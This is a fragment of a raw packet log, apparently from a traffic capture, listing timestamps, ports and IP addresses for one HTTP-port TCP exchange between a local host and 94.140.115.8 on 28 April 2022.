Apr 28, 2022 15:36:10.358814001 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.358859062 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.358892918 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.358910084 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.358941078 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.359374046 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.359412909 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.359436035 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.359445095 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.359453917 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.359487057 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.367695093 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.367719889 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.367737055 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.367813110 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.367829084 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.418039083 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.418067932 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.418086052 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.418118954 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.418155909 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.419680119 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.419701099 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.419718027 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.419739008 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.419769049 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.419939995 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.419959068 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.420005083 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.420075893 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.420098066 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.420121908 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.420154095 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.420186996 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.421114922 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.453628063 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.524996996 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.855468988 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.855513096 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.855535984 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.855559111 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.855573893 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.855582952 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.855603933 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.855604887 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.855623007 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.855643988 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.855648994 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.855659962 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.855669975 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.855688095 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.855699062 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.855703115 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.855732918 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.855750084 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.910007000 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.910058022 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.910074949 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.910093069 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.910124063 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.910159111 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.910226107 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.910244942 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.910273075 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.910299063 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.910543919 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.910563946 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.910581112 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.910598993 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.910612106 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.910624027 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.910635948 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.910655975 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.910675049 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.910717010 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.926672935 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.926696062 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.926790953 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.970352888 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.970383883 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.970403910 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.970417023 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.970453978 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.970494986 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.970532894 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.970551014 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.970588923 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.970592022 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.970611095 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.970628023 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.970634937 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.970647097 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.970660925 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.970671892 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.970701933 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.970717907 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.032479048 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.032521963 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.032562971 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.032603025 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.032609940 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.032639980 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.032665968 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.032679081 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.032696962 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.032708883 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.032726049 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.032957077 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.032999039 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.033015966 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.033040047 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.033046961 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.033066034 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.033088923 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.033106089 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.033121109 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.033148050 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.033150911 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.033188105 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.033195019 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.033216953 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.033232927 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.033267021 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.080559969 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.080615044 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.080655098 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.080667973 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.080694914 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.080701113 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.080734015 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.080771923 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.080777884 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.080802917 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.080840111 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.080861092 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.080995083 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.081032991 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.081073046 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.081090927 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.081114054 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.081120968 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.081157923 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.081171989 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.081199884 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.081211090 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.081227064 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.081253052 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.081270933 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.090908051 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.090955019 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.090996027 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.090998888 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.091017962 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.091031075 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.091089964 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.134172916 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.134229898 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.134269953 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.134298086 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.134331942 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.134339094 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.134362936 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.134381056 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.134386063 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.134418964 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.134426117 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.134449005 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.134468079 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.134495974 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.134735107 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.134777069 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.134793997 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.134815931 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.134828091 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.134845018 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.134865999 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.134892941 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.147710085 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.147798061 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.147840977 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.147870064 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.147967100 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.148016930 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.188642979 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.188699961 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.188740969 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.188780069 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.188819885 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.188829899 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.188858986 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.188867092 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.188874006 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.188879013 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.188890934 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.188921928 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.188930988 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.188955069 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.188970089 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.189009905 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.189034939 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.189038038 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.189069986 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.189100027 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.199100971 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.199151039 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.199198961 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.199227095 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.199297905 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.199338913 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.235191107 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.235253096 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.235297918 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.235337019 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.235346079 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.235377073 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.235382080 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.235399008 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.235414028 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.235443115 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.235470057 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.235482931 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.235490084 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.235522985 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.235532045 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.235563040 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.235573053 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.235590935 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.235613108 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.235630035 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.235651016 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.235671043 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.235685110 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.235711098 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.235718966 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.235738993 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.235763073 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.235781908 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.243061066 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.243117094 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.243160963 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.243189096 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.243211985 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.243331909 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.275296926 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.275352955 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.275394917 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.275435925 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.275450945 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.275476933 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.275518894 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.275523901 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.275533915 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.275547981 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.275594950 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.275614977 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.275649071 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.275686979 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.275727034 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.275753975 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.275768995 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.275803089 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.275806904 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.275846958 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.275850058 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.275876045 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.275883913 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.275916100 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.275944948 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.333287001 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.333345890 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.333386898 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.333429098 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.333427906 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.333467960 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.333472013 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.333473921 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.333508968 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
